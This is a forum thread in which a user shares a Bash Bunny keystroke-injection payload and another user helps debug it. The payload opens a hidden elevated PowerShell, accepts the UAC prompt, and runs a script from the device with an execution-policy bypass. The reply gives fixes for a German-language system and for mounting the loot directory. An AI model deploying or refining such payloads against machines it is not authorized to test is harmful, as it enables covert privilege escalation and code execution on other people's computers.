Bergerjarl Posted April 27, 2023 Share Posted April 27, 2023 Hi, My case is want to run Powershell as admin but bunny language is not working on UAC. Payload.txt file look like bellow and my UAC setting is like the link i added the end of the post: #!/bin/bash # Options LOOTDIR=/root/udisk/loot/badmin ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE ######## MAKE LOOT DIRECTORY ######## mkdir -p $LOOTDIR ######## ATTACK ######## LED ATTACK RUN WIN "powershell -windowstyle hidden start-process powershell -verb RunAs" sleep 3 Q ALT Y sleep 2 Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\p.ps1'" Q ENTER sleep 1 QUACK STRING "powershell -ep bypass \$src" Q ENTER Q STRING "exit" Q ENTER ######## FINISH ######## LED FINISH ------------------------------------------------------ My UAC setting is like described here (se the screenshoots in the article): https://www.tenforums.com/tutorials/112476-enable-ctrl-alt-delete-secure-desktop-uac-prompt-windows.html Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted April 27, 2023 Share Posted April 27, 2023 (edited) What keyboard layout language does the target computer have? US English or something else? And, if the OS language is anything else than English? Edited April 27, 2023 by dark_pyrro Quote Link to comment Share on other sites More sharing options...
Bergerjarl Posted April 27, 2023 Author Share Posted April 27, 2023 I have changed the language to DE, and it is working. Quote Link to comment Share on other sites More sharing options...
Bergerjarl Posted April 27, 2023 Author Share Posted April 27, 2023 Just UAC not working.... The UAC in the first window askd the my credential (I am admin, no need to enter my credential), next windows asked CTRL + ALT + DEL to enter my credential and the third windows shows Run powershell as admin... Do you know which commands i need? Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted April 27, 2023 Share Posted April 27, 2023 So, not to be confused... are you required to enter credentials or just needing to "answer" Yes in the dialog window that shows? And, is the system language also German or just the keyboard layout (with English Windows version)? Quote Link to comment Share on other sites More sharing options...
Solution dark_pyrro Posted April 27, 2023 Solution Share Posted April 27, 2023 If the system language is German, then the shortcut letter is probably not "Y" as in English, but most likely "j" (for "Ja"), so "QUACK ALT j" should be used instead Some other things: - The "result" of GET SWITCH_POSITION isn't actually used in the payload, the switch position is instead hard coded in the script. Change that to use $SWITCH_POSITION to make the script more transparent and increase the chance that it will execute successfully despite what switch position the payload is stored in. - Also mind the use/creation of the loot directory. The idea is most likely that this is supposed to be created on the udisk so that it is presented to the target as it is mounted when using ATTACKMODE STORAGE. However, that will not be the case here since the udisk is never mounted to the Bunny itself unless you actively do it manually from the Bunny side using "udisk mount" (the /root/udisk directory is just a "mount point" and should be empty unless nandf is mounted to that directory). So, that loot directory will not be created in a way that it will be presented/available to the target computer. If that is needed, I would most likely mount the udisk and create the directory and unmount the udisk before executing ATTACKMODE STORAGE (since the udisk ideally shouldn't be mounted to both the Bunny and the target at the same time). The payload most likely fails if set up as it is in its current state. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.